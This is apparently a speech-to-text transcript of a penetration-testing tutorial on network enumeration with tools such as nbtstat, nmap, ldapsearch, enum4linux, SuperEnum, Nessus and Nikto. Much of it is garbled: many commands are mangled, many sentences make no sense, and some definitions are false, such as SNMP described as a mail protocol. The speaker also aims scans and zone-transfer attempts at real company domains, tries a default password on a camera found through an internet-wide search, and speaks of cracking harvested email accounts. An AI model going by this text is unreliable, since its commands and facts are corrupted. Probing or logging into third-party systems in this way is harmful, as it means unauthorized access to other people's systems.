Using NetBIOS prop as CMD, provide a built-in tools, PT stack, and net view that can be used like first, we just need to identify which port we would like to, which type to look here. For that, we just type search.census. We would like to look from here. So I would like uh, NetBIOS. I would like to look here. This is for a NetBIOS enumeration.
Now we would like to first, I would like to open the, let me just, here it's nowhere. Let me just copy this. Now, we just type, now let you just type as epic, then let paste this. If you get a response, it's well and good. Otherwise, command prompt. So, run in the command prompt, you just type ping. Let me, I just type. So, I not to get a response from here. So, first of all, you would like to look which one is giving you a response. Now, we would like to look this. I just copy. So here I got a response from here. Now I would like to look in the command prompt also. Yes, I'm getting here as a response. So this is in PowerShell. Let me just keep it clear. It was clear here. Now you just type as nbt stat minus a. Then let paste the target IP address. Now, here VMware network ID and network adapter. We would like to do this Wi-Fi 2 local connection. So post not found. Why it shows post not found? So let me just close this and this also. Now I just try here as command prompt. So I just run this and administrator. We just type yes. Now you just type ping, let it paste it. Yeah, you are getting a response. That's correct. Now I just type nbt stat. Oh, I just need to put yes. So adapter status. We would like to use nbt stat minus a. Then let paste it. Node IP address. So where there is not allowed here. Port 8 is available, but we are not getting this posted in the Nginx. We can see. So here, if there is something else is running, we can get it here. Now let me just try as another one. We would like to go back. I would like to choose this. Let me just copy. Now let me come back here. I just type nbt stat minus a. I just pasted this attack. IP address. From here. If anything else discovered from there, we have get from the type stack everything. Like similarly, we can get it here. Let me show you here. So we can get as similar like this here. Like it was displayed here, like nbt stat minus a targeted IP. So where you get a with the Ethernet 2, where which you have IP address that will be present with the scope ID, NetBIOS remote machine name with a table that will play here automatically. It was taking a time because this will be displayed, but it's taking a time. Post not found. Let's see. Host not found host. Okay, no worries. So you don't need to worry. Now, once this is not found, now let's come back here. Now, we just use a command prompt. Now, we just type N minus C. So now NetBIOS status that will be displayed here. So I now have a content here which was a displayed here, otherwise which can be connected here. So where I have a locally these machines VMware adapter and VMnet, then this is my targeted Ethernet and local area. That's it. There is nothing else which I have connected. So using the information, can read and write a remote custom depending on the availability of shares or even launch the data of the targeted machine. So this concludes the demonstration of performing a NetBIOS enumeration using the Windows commands such as nbtstat and netuse. So I can show you here. Once you type here nbt stat minus c, you can get displayed which was connected here a target system. So you can send this IP address as DOS attack. You can modify anything else from the system, from your system. That's so sometimes it may can't able to connect. So we just need to make it work very hard. That's it. So now we are going to do as perform NetBIOS enumeration using NetBIOS enumerator. So what is NetBIOS enumerator? It's a third-party tool designed to automate the process for NetBIOS enumeration. It simplifies the task like discovering a shared resources at open sessions and user to a target system. Now we would like to download a NetBIOS enumeration. This a NetBIOS enumerator from any type of a targeted from any type of a third-party applications. Now we like to use this enumerator, so that I would like to give you this will work only in Windows 7. Now we are in Windows 11. So we can't able to do this one in this, so that's why. So I just only can explain here. So you just enter your targeted IP address in this case here, like you can enter if your targeted IP address is, you just enter 192.168.18. This is my targeted IP address. I just put as 02, then from, let me I just type here as from. Now R2 is, you just come back here, you just enter your targeted IP address 192.168.18.255. That's it. Here. Now you can look here from IP address from to 8. So in this case scenario, you can enter your targeted IP address. Then that will be displayed automatically. What else is available in NetBIOS? Software enumerated here. Now you can here. Now the NetBIOS later will scan and displays the results here. You can get informations here. And if you can click on a plus icon, you can get what are the shared resources that will be displayed automatically from here. Now I can show you here as a NetBIOS enumerator, the source code. So you can download a NetBIOS enumerator, a free tool, and you can try this. A benefits for no, this is small. You just get this is a NetBIOS enumerator. So you can try this. Source code, otherwise binary. Everything is in one way. That's it. So this is the URL. So we just try this. So it's also a same thing. So I don't want to download. That's great. That's it. So this concludes the demonstration of performing a NetBIOS enumerator using NetBIOS enumerator. This enumerated NetBIOS information can be used to strategize the attack of the target machine. So now we're going to start perform NetBIOS enumeration using NSC script. So NetBIOS enumeration can also be performed using NSC script. N provides a range of scripts for enumeration. NetBIOS services, users, and other relevant details. Like here, we would like to go here. So first, we just open your Linux machine. I just type. I would like to write. I would like to delete all sample stress. So I just need to delete some stress. That's it. Now let's just come back. So I would like to use only this starting type address. Now let me I just open the terminal. Now I just type as I make a little bit big map minus I want to come back here minus SE and use stat.nsc, then enter the target IP address. That's it. Now you can look here. It was discovering the ports. As SV detects the service version, must be enables the workers output minus it. NBS.NSC performs the enumeration. Now we would like to look here. The scan results appear displaying the open services along with their version and post results. So let it complete all these things, then we can get here. So in this same case, now just try to scan the UDP port. I just type nmap minus su for UDP. Port is 13. Then you start minus script any stat.nsc. Now let you just press your IP address. That's it. Now here the unit is presented. Then so this concludes the demonstration of performing a NetBIOS enumeration using an NSC script. That's it. So now performing SNMP enumeration using SNMP check. So what is SNMP? Simple Network Management Protocol. Enumeration is a process of gathering information from devices like the switches and the servers. The tool SNMP check is a command line utility used for SNMP enumeration. It helps to extract the information about the target system. If SNMP is enabled and accessed. Now, first, let's go back to our Linux machine. I just jump here. Yes. Now let's wait here get the network. Now get the connector. Now in this same case scenario, now it's clear. So in the same case scenario, so I'd like to utilize the same one. So just copy. Now let's come back here. Now let me I just press here. Now let it be here. I have minus su or u. And a port is I'd like to put as 161. Now I would like to back here. So let me I just delete everything. So we don't want. So just type clear. You just type n minus su. Port is 161 and here what we have to come back. So I'd like to use the same IP address. That's better. Now let's come back here. And let me paste. Yeah, that's it. Now let's see. Now you can see a port is open for SNMP where port 161 is open. So if you want, you can come to here a census.search. You just type a P16. That's here you require one. That's it. The port is open. So establish the SNMP service running on the target machine. Now we should expect the information about that stuff. But we would utilize as SNMP. Then now that's all. Let's wait. So that is appear here. Reveals extracted of SNMP port 161 is being used. But we can't put it here. It's not public. If that machine does not have valid account, no account will be displayed. It's not have valid account here. So then we check command enumerates the target machine. System information like system information, icons, etc. thing. Just type it. Let's go. Now just let me. I would like to go back here. Now just type once. Well, let's just look here. What else I can get? Now, first of all, just copy. Just copy this. I just type nmap. A programmatically using Python and tools like nmap for network reconnaissance. So here we would like to perform. Before this, let I just utilize my event to mission. I just so let me just start this mission. So it's came here. Now I just type check here. Now just open here as SNMP. Type here as app config. So this is my target IP address. So just copy. Let me just come back here. Now let me. I just open the terminal. Let me. I just make it as a little bit quick. Now just write here as a nmap minus su. Port is 389 and enter target IP address 192.168.18.872. So let's just make that big. So let's wait for here. So it was a filter. So minus su performs a UDP scan and port where it was open as 389 for LDAP enumeration. So where it was open for LDAP enumeration. Now, which is open. Now, what we would like to do here is, now we just type here as nmap. Port is 389 minus we just type here as a script LDAP Buret. Now just type here as script args. Then you just type LDAP dot base equal to. Now I just type here as client name equal to as I would like to put here as PCPR. Now let me. I would like to put here as domain name equal to. I just put as domain name as a pentest club. Now domain control equal to. I just put a PCPR. That's it. Now let me just close this and enter our targeted IP address 192.168.18.72. So where it was filtered only the targeted IP address is open, but where my system is very secure, which my laptop is very encrypted. So that's why it was not came here. So my event machine is very encrypted. So he can get the result here, if you put as LDAP, so what is your, it's similarly what like Active Directory. So where that will be displayed here, everything clearly. It was, when I tried here, it was closed and it was getting, before it was open and filter with LDAP. It's closed because I'm going for enumerations. Right. So that's why it was closed. So this concludes LDAP enumeration using Nmap and Python 2. That's it here. So now we are going to perform LDAP enumeration using LDAP search. So LDAP search is a powerful way to retrieve information from LDAP directories. The LDAP search command line tool, part of the Open LDAP suite, allows you to query and extract the objects and attributes from LDAP server. Now, first, let me just come back to again your Linux machine. Now, you just type here as, you just type LDAP search minus H for specify the host is, I enter my targeted IP address. Now minus X is specifies the simple authentications. Minus S specifies the scope, and base naming context. So where something has messed up. So let me just type here LDAP search host minus X minus S naming context. So here where we have specified is, I think is so where LDAP search invalid for H. So you need to put for a capital here. So we just come back here. We just put a capital H. Could not parse the LDAP URI. So why it could not parse? So in this case, so we have make a mistake. No, we not yet make any type of mistakes from here. Now we would like to look here. So once this does not work out, now we just need to type here as a LDAP search minus H for a host. Then targeted IP address is, I just enter my targeted IP address is 192.168.18.72. That's it. And minus X minus S base one naming context. So but it was not given a rightful information. So but here you can get a rightful information. Where in this place. Now let me just try here as again. Now we just try here as with the Payload. Let me just try here. Now we get again an error, so we don't need to go there. So in this next we have got a XYZ thing. So after that we just need to go to for a targeted a domain here, like the CEH domain control is .com. So you just put, I have presented in my Active Directory as a Windows club, then PCPL. That's it here for domain domain controller is pentester club and PCPL. So once this is done, you just enter domain control and domain.com. That's it here. Now you can get entirely like this. Now again, you can try here with the same thing and you just specify like object classes. So where you have object classes, so you just need to copy and paste it here, then equal to. So if you want to get any type of informations from there, you just need to specify the star, then close the column. Then you can get entire what is available and signature everything. So you can decode this one. So attackers use LDAP enumerations for active directory uses. It allows a attacker to establish connections with an LDAP servers to carry out different searches using a specific filters. That's it.
So guys, now we are going to perform NFS enumeration using RPC scan and super enum. So what is NFS? Network file system. So network file system enumeration is a crucial part of reconnaissance to identify shared directories and potential misconfigurations. Tools like RPC scan and super enum can automate this. Like is a tool included in the RPC bind package that helps to enumerate remote procedure call. So you can call it as RPC, otherwise RPC scan services, including in NFS. So first of all, first we would like to walk to our Windows machine. Let's just make it a little bit big. Now in this, so in the search bar, you just type service manager. So you just click on here. Now you just click on add roles and features. Now just click on add roles and features. Now just click on next, next, next. Then you just click on file. So you just click on drop down box. You just click on this so I already installed a server for NFS. Now just click on next. That's it. So you just click on install. So this will automatically install. So now let me just look here in this task details. So there is nothing else. So which I was installed successfully for NFS. Now just let me close this. So now just come back here. Now just type command prompt. Now just type here as iconfig. So this is your target IP address. So you just copy this one. Now let's come back to your Kali Linux. Open the terminal. Let's make it as a little bit big. Now here you just type nmap port part 2049 is for network file system and 192.168.18. Now you can see here where it was in network file system. Now we just need to get a super just I would like to go and get it here a super enum. We just type here as a super enum GitHub. First of all, you is a first repository. Just copy this. Now you just type git clone and paste the repository. It will clone the repository. Now just type cd super enum. Now just type here as clear. Now just type list -l. Now just type here as super enum. So you just type chmod +x super enum. Now just type run here a super enum. So it shows please run the tool with a root user, otherwise sudo, you need to give a sudo rights. So first of all,
you just write here as echo. Then I would like to put here as my target IP address 192.168.18.127. It will give as a target.txt. That's it. Now just type sudo su, enter your password. Then let me just type clear. Now just type +L. Now I have my target.txt. Okay. Now, what we would like to do here is, so we would like to run here a super enum. Then you just type here as a target.txt. So I would like to enter IP list of the file. Oh, here a target.txt. So a TCP scan started for IP address. Now we would like to look here. So basically I don't need to enter first. If you enter the super enum, then it will start for a TCP scan. The script start for scanning. It will take 15 to 20 minutes to complete the scan here. Like it will go for a testing for Nmap, Nmap enum, shares, and XYZ things here. Everything. Now let it wait for this. We would look here. Now you can see here Nmap, RPC info, RPC info. So all the information we are going to get here now about the targeted information. Now in this, let undo. Now we would like to go and get the RPC scan again. Scan up. Now we would like to get this RPC scan. Get this RPC scan. This will communicate with the RPC service that checks a misconfiguration of file system or shares. Now let me just come here, open new tab, just type here as cd, now just type here as here. Now in this same case, now just type git clone and the repository. Now we just type as RPC scan, now just type plus here. Now we have RPC scan.python, now just type here is as RPC scan.python minus health. That's it. So where we need to enter the host port or default. Now we would like to buy RPC scan. Our targeted IP address is 192.168.18.127. Then find RPC, where you can see here where my targeted system is presented here as NFS. You can mount also network feature entirely, which is almost all very easy. When you go with a super enum, this may take a little bit to export here all the operations. It will take a little bit. RPC scan, which take very earlier to proceed it. Now testing for 192.168.18.1. Now we would like to look what is output. Then we can continue from there. So, this controls the demonstration of coming a NFS enumeration using a super enum and RPC scan. That's it here. So now we are going to perform a DNS enumeration using a zone transfer.
So, DNS zone transfer is a mechanism where DNS servers share their data to maintain a synchronization. When improperly configured, it allows attacker to retrieve a full copy of DNS zone file, exposing domain name, subdomain, and other value information. So, here we would like to look here everything. So, first, uh, we would like to come back to here as in the Linux. So this is taking much time. Now let me just make it as big. I exit. Here it is here. You just type cd. You just type here. So from here, it types take a name server of. I would like a www.wellsfargo.com. So I would like to find the name server. So you can see here output. This is automatically will give every targeted website. This Wells Fargo. Again the same. So where is the CNAME which I have? So like use this a name server. So here I have got this security. So I just use n0b dot my edge. I just copy this one. Now again we just type here as a now just type here as a dig the target of name server. Then target domain I put AFR. Now let's like to look here. So option firstly, at very time it was running 68 milliseconds and server IP address where we found exactly the IP address. You can see at the date and message size is received. And after retrieving the DNS name information, the attacker can use one of the server to test whether the target is allows a zone transfer or not. In this case, zone transfers are not allowed on the target domain. This is why the command was a message for fail. A penetration tester should attempt a DNS zone transfer on trendings and target organizations. Now, we have to do same thing as command prompt. Let's just let here whatever. Let's just make now the same command prompt. Now just type here as a and look where here. Now let's type send query type exploit. Then enter what I type here as wellsfargo.com. Now I have got the same thing. Home.wellsfargo.com everything. We would do here is I just type this minus 3. You like with this just copy and paste. So cannot change a bad error view. So you can see here the DNS service refuse transfer zone. Otherwise we just copy list of the domain and restrict. So it was a restricted after retrieving a DNS name for information. The attacker can use one of the server to test whether the target DNS allows a zone transfer or not. In this case, zone transfers are refused for the targeted domain. A penetration tester should attempt DNS zone transfer and performing a DNS zone transfer using dig and nslookup commands. That's it here. So now we are going to perform DNS enumeration using DNSSEC zone walking. So DNS zone walking is a DNS enumeration technique that used to obtain the internal records of targeted DNS server. So we would like to go directly with practical. Now just copy. We just walk here, open terminal. Let me do big. Then let's post it. So let's close the repository. Then just type here as DNS record. Let's type list here. Now let me request.txt. Let's type as 3 instruct minus up recommends.txt. So we would like to install performance. So once it was satisfied everything, now just type here as a binary minus aircon white up minus scale where we have got it here. So like to present targeted domain. Now we utilize 3. Now what's our domain? So we would like to use a.com. Now we would like to look this. Now starting for inversion of IHs. Now you can look here how many TXT records, XYZ records we have got it here. So name server record, ML server records, XT records, records. These are the records where you can see everything here. So, in some case, using DNS or record to attacker can enumerate a general DNS record for a given like SDNS record, SPX record, SPF, and TXT. These DNS records contains a digital signature from public key cryptography to strengthen the authenticating DNS. So, this concludes the definition of a DNS enumeration using DNS zone walking. You can also use a DNS seg zone enumeration such as where let me I would like to show you here as so where this guys they have developed newly NL NetLabs dot Netherlands. You can utilize this one a faster one where fast and authorized for DNS server. So you can utilize this one. Otherwise that's it. That's only the better one. That's it. Yeah. So now we are going to do as perform DNS enumeration using a nmap. So DNS enumeration using nmap is a powerful method identifying DNS related words such as or resolving subdomains or querying a DNS nmap scripting engine, including several scripts for DNS enumerations. So first we would like to come back to our machine. Let me close this. So just type cd type let's just type here. So just type map minus script. So I would like to broadcast DNS service, then discovery, then targeted domain is so you just enter any type of domain like I have to put a domain like zoom.com. We would like to look this. So the results are displaying a list of available DNS service and the target host along with their associated with the ports as shown here. Now let's see what is broadcast DNS services discovered with the TCP. That's it. Where is that port is port 8 is open, port 443 is open here. That's it. There is nothing else is on here. Like to try another one. I just type snap my stream. My port is 443. Then I just write as a script DNS where then I just put as june.com where we have got the port 3 where from 443 where I got it with HTTPS. You can see here .june.com app.zoom.com the targeted IP address with everything entire information we have here. So now if we would like to look as other one, now we would like to try this. Now just try nmap minus script DNS sub enumerate. Now just try script here just try DNS SI. Just type in domain equal to you just need to specify your target domain name as a zoom.com. So it might target a zoom.com. Then that's it. Yeah. Now see no address on host is up because it is blocking my target address. So once it is up, we are blocking my address. In a piece of the instruction detection system that can learn in malware. So here it's not anything else. So I would like to change another thing as else for go like we say this. have got DNS except after discovery 443 after.org. So there we have ended here. So, using this information, attack can launch a publication such as injection attack, force attacks, and DDoS attacks on the domain. This concludes the demonstration of performing a DNS environment using N. So, now we are going another one is SNMP enumeration using N. So, what is SNMP? Single Mail Transport Protocol. You can send like Gmail, Yahoo, one to one place, everything. Now, this and N. So, uh, SNMP enumerations using app involves a program SMS to get information such as valid email accounts, supported commands, version access services. Information can help to avoid potential misconnection or burnouts. Now, you like to look here now. Let I just type here as here now. Let's type here as nmap port for 825. You can mention as post 5 and 57 ports for a nmap. Now, I would like to type minus. Now it's a target domain. I think I have entered a domain which is available now. You can look at third target domains. That is 57 and XP. So where the files actually we can't get. Now, we would like to enumerate from here. I would like to put I just type here another script. SNMP now. Now we would like to look this. So where you can see here my targeted IP address and XYZ things, which here everything in the left side, all addresses. So you can look my MAC address and all information. So let it go for a scanning. Otherwise, it's maybe like left more use 252. Like F40. Now we would like to try this. So once this is completed, now we can you can see here how many IPs I have find here. So once this is fine, now you can look here. This is for my MAC address. You can look IP address and timestamp. You just click on go to NetBIOS. This is a MacBook Air. This was displayed here, timestamp, everything, which is presented everything about timestamps or XYZ things here. Now, when you go for a scan summary, you just type a computer. You can look about a computer, MAC address, RAM, hard disk total size. It's not presented. RPC server is unavailable. So here we can identify very easily if you click on this. So now I just click on this. So this is an Wi-Fi router. In this, a status is success. That is an Wi-Fi router and MAC address. That's it. Now this is a view. This and appliances. Now we would like to look. This for a Samsung fridge. So this is also connected for Wi-Fi. It's not available. This is for and appliances of CC footage. So it's also not available. Again, this is so where my main system is not presented here. This is in drawback. So this is also appliances. So where if it is a target, you can look this a targeted computer. So where it not identified, and in this have a lot of information. Now we would like to look this, but
here we would like to look here as shares. So here I have a directory. So now you can look here in this share directory, a special share and special share C and IPCC, everything we can see here. But I not yet get reports. Open a report folder. No have. Just type tools. Uh, SNMP. I will distribute this. So where it have network file system is GB around. You can see here it was divided 30-30. Okay. So these are all laptops, otherwise phones or applications. So here, nothing. That's it. So this concludes the demonstration of performing a global network inventory. So guys, now I'm going to do as enumerate a network resource using as advanced IP scanner. So what is advanced IP scanner? Advanced IP scanner is a lightweight, easy to use tool for scanning and enumerating network resource. It allows you to discover devices on your network, gather information and manage them. So we would like to do that one. So first we would like to walk to our virtual machine. So you just need to come to an advanced IP scanner. You just click on download. So I have downloaded this advanced IP scanner. You just type run. Try to click on OK. Just put this. Click on next. You just accept the agreement. Now it will address and it will be simply presented here. Now just click on scan. Now the scan will start now. Now let's see here. Which advanced IP scanner scans the target IP address and range with the progress of track the status we would like to look here. So where in 21 is my main system. This is for my Windows is in the VMware. This is for Samsung Electronics Company Limited. So I think it's with MAC address is also presented over there. Now you just click on any one of these one. You just click on expand. Here you can look here where it is available with HTTP and IIS Windows server with HTTPD server and FTP Microsoft FTPD. So that is also available here, and this is not available. So you can cross check this where in 21 there is available with the HTTPD. In 12 this is available with only HTTP. I would like to walk this one with the Firefox. Visual. We don't know this. Take vision passwords admin 12345. Now let me just write here as admin 12345. Incorrect username. Admin 12345. So we can't able to log in here. So this is what a camera. So this is not possible to look here. Now you can extend here HTTP with the log change passwords, everything. So that's it. So we can see all this. Same way, you can select various other options and retrieve shared files, view system related information and etc. So this is for my local machine with some of a targeted one. Now a Genesis search. Now let me just go to here as Genesis search. Now just type here as some type of hotels. Now let me just now I want to take as this one. This is in targeted IP address. Now let me I just paste it here in last octal. So I just need to put as, so first let me I just 254, okay, 0 1 2 254. That's it. Now you can scan this. Now let it will start for scanning. Now we can see everything. Localhost, localhost admin, mail with the TRM. You can see a lot of informations here. You can find here. Now you can look here. This is an FTP server. Where is available this one? UFTPD version is 4.0. So all everywhere is FTP servers. So that's it here. Now, if you want to visit this targeted website, you can see a interface to a root. Let browser is not supported. Now just cut. We just close this. Now let me. I just want to here to do it here. So browser is not supported. Smarter Mail utilizes the latest browser technologies. This browser version is not supported. Use one of the following browsers is best performance. So I utilize Firefox, but the main interface, so it's not supported. Okay, I have latest one. Let me. I just copy this one. Now let me. We would like to utilize this here. This also is same. So we are enumerating in the right pathway. Now you can look here. Mail clt.com company in the mail. Now we would like to look this. I don't know the username and password. How we can enter here. So using from here, we can generate our own email list and we can use this information to crack in the same way we have done here. We would like to crack these passwords and we would like to access for this. So this concludes the demonstration of enumerating a network resource using advanced IP scans. That's it. So now we are going to do for enumerate information from Windows and Samba using a enum for a Linux. So we would like to learn how we would like to enumerate for enum for Linux. Enum for Linux is a Linux-based tool used for enumerating information from Windows system, specifically those that support for SNMP server, messages block, or protocol. It's widely used for a penetration testing to gather information such as username, shares, groups, membership from Windows system. So we would like to walk directly from here. So this is, so let me, I just try clear here. Now just come back here. So here also just, now you just try here as enum for Linux minus host. So I would like to enter my target IP address 192.168.18.127. Sorry, I have made a mistake, so I just don't enter like that. Sorry, so I just need to put only H or L. So like get user list, get a machine list, get a shell, all available. So do all simple enumerations. So I would like to do a simple enumeration first. So that's enough first. Let me, I just type here as for Linux minus A, enter what target. Type here as 192.168.18.127. Now, server does not allow sessions using a passwords or botting. Now, it was started here, but it was archived. That's now we would like to walk to here. So now we would like this IP address. Now just write here. Now just type in this we have a like practical here. Let's enumerate this. We can see here. So this for Linux will take a little bit time. It works similar like find what group main. So it's okay. We can find groups or usernames, everything. So it's not allowed. So it's not have anything else. So we just look as let me. I just type here as clear. Now we need to enter only the target address. So I just type here as web zoom.com. Let me, I would like to look this here. So I just utilize this. Let me paste it. So if you can enumerate all here, you can edit here. So also, if you find any one of the targeted IPs, so I particularly don't know if some targeted IP address. Otherwise, if you have a FTP, otherwise XYZ things, you can utilize that one. So I would like to start my Ubuntu machine, then to try to enumerate the Ubuntu machines. Then we would like to look how we can get it done here. Now let me start this. So you're starting. Now just enter your password. Then here let it may take a 1 to 2 seconds. So I just type eject it. Now let's come back here. Now I just type clear. Now I just type here as 192.168.18.872. Now we would like to here. Now like administrator guest XYZ will be displayed here, but can't find ever group or NBT stat information, NetBIOS informations. Let it look. So servers does not allow sessions using username and password. So it also is saying that's it. So once I can show you. So let me just this. So let me, I just made this. So let me just close this. Come back. So here, once you enter here, like if you want to go with entirely, like in this place, just to present a. Otherwise, if you don't want to, if you want to do it, some username, password. So enter your username and password, the targeted IP address, and you can get all the targeted informations about the system. Then you can also get NetBIOS status informations. Then you can see your NetBIOS status where that is running inside the group. Then again, you would like to run with targeted IP address. So the same thing. You get advice, systems, work groups, everything. So here, this will expose the right usernames, otherwise right passwords. That's it. Like if you go for a group enumeration, you specify enum for Linux minus G. That's it here. So for password policies, all options will be displayed here. Everything. So using all this information, the attacker can give an unauthorized access to a user account and groups, view a confidential information in the shared device also. That's it. So this concludes the demonstration of performing enumeration using enum for Linux.
So now we are going to perform a SNMP enumeration with SNMP walk on and using a. Let's we would like to type here as. Let me just type here as clear. Now we just type here as a SPD. Just put as a chat. Now we have for networks. Now we just go for enumeration. Now I just put as a E. That's it. Now with the E now I put N as a chef. Now we would like to type here as a perform a SP enumeration on a target IP is 192.168. So I would like to want to go with this nonsense. I would like to. So here is available as a SNMP. I would like to present this on the target like this. So but it take a little bit lengthy time process because we are doing as in line. So we just need to wait the patience. Now using SNMP walk and display results here. Let me just type here. So I just try to execute. And response from a target like this. The cloud is so just as me state.18.r21. We would like to look here. Let's execute. So here is the results we can get here. No response from the IP address. So if there is a SNMP enumerations, we can get easily. So now I would like to go on such direct MP. What is the services we can get here? I would like to try this target address. Just come back. Let me just it. Just put for us so it's not getting a response from targeted IP address. So otherwise we are connected to a net. It's refusing out. For SNMP enumeration using a target. Now I would like to present as very clearly as a SNMP walk. Then we would like to try here. Let's execute. Response from the IP address. I would like to using as I would like to put as a nmap. Then just execute this. So it may take a lengthy time process. Yes, we will try here. If it is open and filtered, that's why we are not getting the results. You can change here as I would like to put here as something as I just put here as clear. Now you just you can also look here as you just put here as a nmap. We would like to wait for execute this. We can see the results with your local port and we can get here. So it's open filter, that's why you cannot get it. So it's with the corporate, so you cannot get with this as results. So if it fully open, you can get everything results here. That's it. So this is how you can perform as SNMP enumeration. That's it here. So now we have to enumerate as SNMP, DNS, SH, and FTP enumerations using type of targeted attacker. So let's we would like to go back here with let me just start as clear. Just put as HTTP. You just put as chat enum. You just here as shell perform SH. So let me I would like to I just put S enumeration. Targeted attackers in app and display the results. I think you would like to look here as the execute. It's filtered, so it's available. If it how you can try here. So way I like to try as a event for better access. I would like to as a event because event there is available as such. Let me I just enter my password. Let me come back. Close this this. Just type as clear. Let me just clear. Close all the time. Just type it as iPhone. This is my targeted IP address. Let me just put here as 72 using Nmap. It's filtered. I'd like to using as SH. You would like to try to enumerate debugging connect to the targeted port ID. So it's a debian with our OSL. So if that is connected with a valid usernames and passwords, then you can try to get in it directly. Now, it's not going to be well. Let me I just start clear. Now, I would like to go for a enumeration, so I just put here as CPT. You just put here you just put shell. For a CP in target I is 192.168.72 with the Metasploit. Yes, we would like to try this. We would like to execute. So it may take the time process also here. Now let's we would like to copy entirely this as a just copy. Now let me just put here. Now I have to put for a exit also. Sorry. There is a mistake. Such means this one. So I think permission is denied because it's only a target one thing. So scan one or one post available, so it's available there. Okay. Here with ASP. That's it. Now you present without Metasploit. I think we can get a valid filter that is empty. So you have a valid usernames or everything over there. Then you get every related information over there. That's it. Okay. So, but we have as a S, but it's not worked out. Let's. That's it. We would like to try as in this case scenario, let's like to put here as a search. Let's like right here. It's filtered, but it's not going with as a AI. So that is very distinct. So we like a DNS enumeration, just write clear. Now, just here as activity chart, you just put here as a enum, put here as shell. Then you just put here as use a nmap to perform nmap DNS enumeration on a target domain. So this is how done all as our target domain is a github.com. But this may present all the information. That's it. So where it was presented with every information about the target information. That's it here. So that's it here. So now we have done this as a DNS enumeration with on target domain with the github.com. Now we would like to try as with the same thing as DNS snooping using AI. So we would like to utilize here. Let me just clear as STP. Just put here as a chat as a email. Just as shell. Then we just type as a use a command. Use a command to perform DNS catching, snooping, a domain. We would like to get a GitHub. Then use a recursive method. I would like to recursive method. Then just stop there. And I just also use a DNS server IP as DNS server address. So the DNS server IP address is so I would like to set one of the right address. So this is the right IP address. So let's just copy this one. Let's come back paste here. That's it. Then enter here. Let's go back to look here. So I think I made an error. So if you type it as error here, that right error here. So where you have made a mistake, I track most calls with app.me. Use a control comedy which is fine. GitHub.com using a recursive method. So MEH. So this you need to remove this a full stop. Let me just write last clear. So now I think recursive method used in server again. So it's not working out. The recursive method use DNS server as I would like to type as clear this one. So I have recursive. So we just try this. So the result is not coming out. What else we are trying? Permissions. So let's put class in recursive. So the third is not ADS as hyperus. So it's also not 21. Method. So just I need to pass here. Then use here. So it's also chat session is error. Thus this is not is good about targets. That's it. So let's try this as a recursive. So it's not going to work out. That's it. So now for as a IP sessions with we would like to enumerate a target IPs with how we would like to perform this. We are as a chart and we just as a then we have to utilize as a perform a enumeration on a target ISS 168.72. Then with nmap, let's move to with our so is denied. Okay, here is a permission is denied. Let me copy this. Come back. I just type as here. Let just press here. Execute. It was working out. In this case, I have to put this my password. I just look this as GPT. Let me just copy back. Let me just press. So not like that. Let me try this. So, this is work under the root privilege in your Linux system. It's communications targeted. So, communicate the right that is here. The option is which we like to use here. Here is recursive. Then recursive. We would like to try. Then execute communication. So that's. Let's try this now. This is it. We have like put here. So IP and that one, which is as a filter. Let's like to try as a. This is a target credentials. We have given here. That's it. Target to prayer. Any host or IP address CDIR blocks in a common or separate. So I just put here. That's it. Now let's just come back to here, back to scan. Then I just try to launch this. Now it was running. So this and all a time-taking process. It may take how long, prefer not to say. Otherwise, we just try this. So this is a test.php. Now I can try as one more one is. So I would like to try as another one as let's just look at web application test. Now just type here as web.com. Then you just click on save. Then you just try to launch here. So this is taking a too long time to present. So where port 80 and port 443 is available here, that was only a found open ports. It's a time taking process. So now this and SSH vulnerabilities. You can see a info netstat port scanner for SSH. You can look here, 22 SSH, 68 hosting is there, 546 is an UDP port was found, it was open, and the history and vulnerabilities. So if it only information, it give only information. So if it low, medium, high, critical, you can get a lot of things that you need to be wait and see here. You just look this. It's also take a lengthy time process. So even it will be displayed here some of the everything. Then you can conclude that one also for your wish. Like we would like to get here as one more thing. Now let's just come back here. So I just need to search as portals. I would like to try this portals.my.org. Like to utilize this a targeted IP. Come back, copy, come back here. You just click on new scan. Just look this, paste it. You just type portals, then just click on save, then try to launch. In this case, here you can look here. I have found in this case test.php.web.com. Here I have found 8%. One is with the medium, another one is low, and info. Now we would like to look here. This is medium. Now we would like to look here. The remote web server does not set an X-frame option response header or a content security policy frame ancestor response header in all content response. This could potentially expose a site clickjacking or UI readers attacks in which an attacker can trick a user into a clicking area of a vulnerable page that is different than what user perceives the page of that. You can look here, test.php, where you can get it here. You just click on more. You can get all those things here with all the remediations. Very easy way you can get it here. Now we just come back here. This is a mixed info. You can look here, hello, web server transmit create. You just look here, login.php, user.info, that's it. This remote web server contains several HTML form fields containing an input type of password which transmit their information to a remote web servers or a client. That's it here. So this is info where you can get, that's it. CGI generic injectable parameters where you can inject, also you can show them, that's it here. Now let's come back. So test.php, this is done. In this master we have got only all only for info. Nobody is going to pay you any type of bounties here. Let's come back. Then we would like to look in the vulnerabilities is 25. SSH for multiple issues, Linux, NetStat, Linux, Ethernet MAC address, devices. You can look SSH multiple issues, BIOS, enumerate a MAC address, enumerate the network informations, every information you have seen here. That's great. Let's come. Vulnerweb. There is no in this. So it may taking process this one. So the demonstration of performing a vulnerability assessment using the NISOS. That's it. So now we are going to discussing Nikto. So what is scanner? Nikto is an open source website to identify potential vulnerable configurations and security issues in web servers. It is widely used in penetration testing and security professionals for quickly and efficient reconnaissance of web servers. So what are the key features we can get here? So the main key features we can get here: compressive vulnerability scanning. It can check over 6,700 potential dangerous files and CGI bin files, and scans for a misconfiguration servers and outdated softwares, identify default files, insecure configurations and more. SL TLS supports. It detects a weak SL and TLS configuration and insecure ciphers. Open, secure and free, written in Perl and freely available under in the GNU or GPL license, customizable and extensibility, supports a plugin to extend functionalities, allow a custom scan database to test a specific vulnerabilities. Virtual host support, scan multiple domains hosted on single IP address. Proxy supports, can route a scan through a proxy for a better anonymity. Integration with other tools can be used alongside tools like Metasploit for advanced penetration testing workflows. Through HTTP pen testing, it detects issues, HTTP header methods, and response. So first we would like to walk to your Linux. So I just made as this one a little bit big. So is any one of the targeted domain to target my system. So I just write here to go as a WordPress website, any type of WordPress website. Then where we can get, so we would like to take this. Now that we just look this port 80, so we just open this one in the new tab. We can see here Truckee Linux, just another WordPress website. Now, this targeted website, okay. Now, we would like here. Where is this? HTTP. Just copy this one. Now, let's just open the terminal. So, let's just make it as little bit parascripto minus search. And let you just paste it here. That's it. It will scan entirely of the targeted website. It was a Drupal with a link header I found it with the targeted route. Then reference.w.org and see with the Drupal.org and see with the NetSparker vulnerability scanner. It was hosted with the Nikto. So now let Nikto can scan this targeted 